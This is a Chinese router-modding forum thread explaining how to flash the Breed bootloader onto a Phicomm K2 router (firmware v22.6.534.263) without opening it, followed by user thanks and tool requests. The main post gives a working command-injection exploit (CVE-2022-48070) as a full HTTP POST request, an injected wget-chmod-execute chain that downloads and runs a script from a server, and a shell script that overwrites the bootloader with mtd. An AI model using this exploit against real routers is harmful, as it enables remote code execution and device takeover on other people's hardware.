QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[k2] 斐讯K2 v22.6.534.263 直接刷固件!【附工具】 免拆机ttl

火... [复制链接]

2023.02.15 上工具
适用【v22.6.534.263】【v22.6.529.216】等,更多大家自己试。
我只测试了这两个比较高的版本,我手头现有的两台K2(硬件A2)均OK。

之前一致没找到现成的工具可用,昨晚发帖后经网友提示,找到了tianhaoba大佬之前写的工具。
直接用无法成功,所以今天根据原理做了修改,感谢前人大佬耕耘,小小修改送给大家。

原工具支持:
   K1: V22.4.2.15
   K1S:V22.3.1.5
   K2: V22.2.15.128  V22.3.15.232  V22.3.17.148
            V22.4.2.8     V22.4.2.9
            V22.4.5.39    V22.4.5.42
            V22.4.6.3
            V22.5.7.118   V22.5.9.163 V22.5.10.530 V22.5.10.552 V22.5.11.5
            V22.6.503.31 V22.6.506.28 V22.6.507.43 V22.6.510.57 V22.6.511.69 V22.6.512.75 V22.6.518.161
   K2P:V22.8.5.189
大家测测看吧,期待您的反馈。

下面是原帖原理说明等内容,不想看的可以忽略。
------------------------------------------------------------------------------
各位恩山的朋友,大家好!

本人今天之前从未接触过路由器刷机,家里的K2用了很多年了。
今天是由于实在苦恼v22.6.534.263版本的广告,经常劫持,弹出一些不明觉厉很黄很暴力的页面。
所以趁今天家里人都出门了,打算好好研究一下,给它办了!

由于之前没关注过,今天有幸看到恩山论坛,以及网上各路视频、文字等教程,
总算对路由器刷机有了一定的了解,但不幸的是,我的是最新版本,没有现成的教程和工具可用,

所以在了解了原理后,自行手动,从下午一直研究到现在,没错搞到23:30多,终于直刷成功!
看到有很多朋友受此版本困扰,所以特地注册发帖把将方法分享出来!
如果有大神看到,可以直接集成进工具,原理和前几版本都一样!
废话结束------------------------------------------------------

路由器型号:K2

硬件版本:A2
软件版本:22.6.534.263

我看到的刷机工具都是利用路由器web管理系统漏洞,在路由器上执行shell命令,进行开启telnet、ssh等,然后用命令执行操作的。
v22.6.534.263版本一样有命令执行漏洞,详细见CVE漏洞公告【CVE-2022-48070】

漏洞位置:“自动升级”--》“升级时间”处

证明有效的POC:

完整数据包:
  1. POST http://192.168.2.1/cgi-bin/luci/;stok=73fbbfe80fb9f7d9d881a576b0d56122/admin/more_sysset/autoupgrade/save HTTP/1.1
  2. Host: 192.168.2.1
  3. Connection: keep-alive
  4. Content-Length: 25
  5. Cache-Control: max-age=0
  6. Upgrade-Insecure-Requests: 1
  7. Origin: http://192.168.2.1
  8. Content-Type: application/x-www-form-urlencoded
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  11. Referer: http://192.168.2.1/cgi-bin/luci/;stok=38a2772da5876e02bb05b34e1dc8d1dc/admin/more_sysset/autoupgrade/
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Cookie: sysauth=417a4f67659bacbd2b8defdec94822c8

15. mode=1&autoUpTime=00%3A00%3A05%7Cid%20
复制代码

验证成功后,开了telnet、ssh,但是我觉得没啥用,直接在web执行命令就能刷入breed了。
执行的命令如下:
wget http://本地服务器IP/breed.sh -O /tmp/breed.sh;chmod 755 /tmp/breed.sh;/tmp/breed.sh
所以完整POST包为:
  1. mode=1&autoUpTime=00%3A00%3A05%7Cid%20%3Bwget%20http%3A%2F%2F%E6%9C%AC%E5%9C%B0%E6%9C%8D%E5%8A%A1%E5%99%A8IP%2Fbreed.sh%20-O%20%2Ftmp%2Fbreed.sh%3Bchmod%20755%20%2Ftmp%2Fbreed.sh%3B%2Ftmp%2Fbreed.sh
复制代码

breed.sh内容如下:(脚本breed.sh和固件breed-mt7620-phicomm-psg1208.bin两个文件会放在附件,注意如果更换固件文件,则这个sh脚本中的文件md5值要改
  1. wget -T 10 http://本地服务器IP/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin

2. #判断是否有下载文件
  3. if [ -f "/tmp/breed.bin" ] ;then
  4. vmd5=`md5sum /tmp/breed.bin|cut -d ' ' -f1 `
  5. #判断下载文件的MD5值是否正确
  6. if [ "$vmd5" = "06763991cf7f1768659e09401f966318" ] ;then
  7.   #如果正确则开始刷写breed
  8.   mtd unlock Bootloader
  9.   mtd -r write /tmp/breed.bin Bootloader
  10. fi
  11. fi
复制代码

等待重启完毕,因为只是刷入了breed,所以正常启动的固件还是
v22.6.534.263,一切正常后,
然后拔掉电源,按住reset键,插入电源,等待5秒松手,打开192.168.1.1看到了breed web。
然后刷入了网友推荐的第三方固件,试用几天看看还有没有广告。。。

因为从没搞过刷机,不知道方法对不对,还能不能在其他人那复现。写的不对的地方还请海涵!
总体思路和验证代码我尽量详细的给出了,我也不会做工具,感觉挺麻烦的。
还请大神或之前刷机软件的开发大神们集成进工具。
今天太晚了,后面我看看有没有现成的软件能方便的完成这些操作,再来跟大家分享。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

评分

我*** + 2 你好,久仰卧龙大名,在下凤雏!.
zhb*** + 1 感谢你的分享,无论怎样,你都是最无私的人.
zhang*** + 1 一看就是觉得高端、大气、上档次!.
zu41*** + 2 风清云淡、飘逸悠然……极爽!
zo*** + 1 你好,久仰卧龙大名,在下凤雏!.
dongj*** + 1 牛XXX
wangch*** + 1 有才
yk*** + 2 一看就是觉得高端、大气、上档次!.
writ*** + 1 强大的恩山!(以下重复1万次)
peyt*** + 1 强大的恩山!(以下重复1万次)
3341*** + 1 你好,久仰卧龙大名,在下凤雏!
bs*** + 2 风清云淡、飘逸悠然……极爽!
912*** + 1 不错,支持下

我的恩山、我的无线 The best wifi forum is right here.
牛逼,谢谢分享
我的恩山、我的无线 The best wifi forum is right here.

这个厉害,时隔多年,居然出了免拆刷法。。虽然看不懂。。。。。

早就免拆,我上一年就是免拆刷了bread,只是K2百兆网口性能有限,无奈放弃  详情 回复 发表于 2023-2-15 08:54

这个厉害了,收藏备用  改天抽空仔细看看

果然是高手,一点就通

我14号搞了一天没有刷机成功,麻烦问一下楼主,这伙人需要用到脚本吗?

能详细说说那些开发者工具怎么使用的吗?

整个调试流程比较麻烦。 楼下有朋友提示了有现成的工具可以改改用,我回头研究一下看行不行。  详情 回复 发表于 2023-2-15 16:00

有没有大佬弄个工具啊

免拆确实厉害了

高手,感谢分享。

我是把闪存拆下来编程器刷不死鸟然后再焊上去,最后刷老毛子固件

整个情人节都在捣鼓刷机啦,为你的奉献精神点赞

矿佬 发表于 2023-2-15 01:36
这个厉害,时隔多年,居然出了免拆刷法。。虽然看不懂。。。。。

早就免拆,我上一年就是免拆刷了bread,只是K2百兆网口性能有限,无奈放弃

能说一下怎么刷的breed吗?谢谢。  详情 回复 发表于 2023-2-15 15:07

我是用工具刷的bread,你这个用命令去操作显得更有技术,

ptt
求工具啊,谢谢老哥  详情 回复 发表于 2023-3-26 14:31
能分享一下工具吗?谢谢  详情 回复 发表于 2023-2-15 15:08

这个漏洞应该早就利用了,你可以试着改一下旧的刷机脚本

下载刷机.zip解压,右键刷机.bat,记事本编辑查找替换,把autoUpTime=03%%3A03 替换成autoUpTime=03%%3A03%%3A03没测试

https://www.right.com.cn/forum/thread-209423-1-1.html

大哥,k2p应该怎么利用这个漏洞  详情 回复 发表于 2023-10-14 17:24
何必呢?少说几句吧,网络这么大,聚到一起也不容易!: 5 不喷一下你今晚是不是会失眠啊?药不能停啊,兄弟!: 5 好帖,今年最好的贴子!: 5 这B装的一流啊!: 5 真的是很凡尔赛!:   发表于 2023-10-11 16:50
谢谢,263一次刷机成功  发表于 2023-10-5 22:52
K2 A6 v22.6.534.263刷成功了,过了那么多年了,大佬真是牛逼啊  发表于 2023-8-4 11:44
感谢分享,我回头研究一下,那个下载要币,我新号没币,能分享一下吗,我研究研究改改看。  详情 回复 发表于 2023-2-15 15:55
大佬,按照你的提示,已成功刷机  详情 回复 发表于 2023-2-15 14:00